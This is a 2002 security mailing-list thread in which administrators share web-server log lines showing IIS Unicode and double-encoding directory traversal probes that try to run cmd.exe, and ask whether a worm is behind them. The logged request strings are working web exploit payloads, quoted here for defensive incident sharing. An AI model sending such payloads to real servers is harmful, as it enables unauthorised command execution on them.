[unisog] increasing cmd.exe port 80/tcp probes

Mike Powell mpowell at mijk.dnsalias.com
Mon Jun 3 09:12:21 GMT 2002


Hi

They are attempts at the IIS UTF/UNICODE directory traversal exploit.
Shouldn't be a worry if you're fully patched. They usually originate
from somebody's home machine which has been infected (apparently).

I'm seeing a lot of this, and also Nimda and Code Red on a daily basis.

Mike Powell
Barry College
Wales


-----Original Message-----
From: Jeff Anderson-Lee [mailto:jonah at eecs.berkeley.edu] 
Sent: 02 June 2002 18:05
To: unisog at sans.org
Subject: [unisog] increasing cmd.exe port 80/tcp probes

Starting on Jan 5, 2002 I've been noticing some particular probes
appearing regularly in my apache logs.  There are two patterns of
note.  The first is a single probe:

    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"

and the second is a pair of probes:

    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1"

At first, seeing a new host with these one of these probe patterns was a
weekly event, then later about once a day.  However in the past
thirty-six
hours I've started to see a sudden rise in the incidence of new hosts
scanning with the first pattern:

dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700]
"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((-
-> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700]
"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((-
-> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 -0700]
"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((-
-> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- ->
/scripts/..%5c%5c../winnt/system32/cmd.exe))


Has anyone else noticed these patterns in their logs?  
Does anyone know if a virus/worm has been identified with this
probing pattern?

Jeff Anderson-Lee
System Manager, Digital Library Project
ERL, UC Berkeley




More information about the unisog mailing list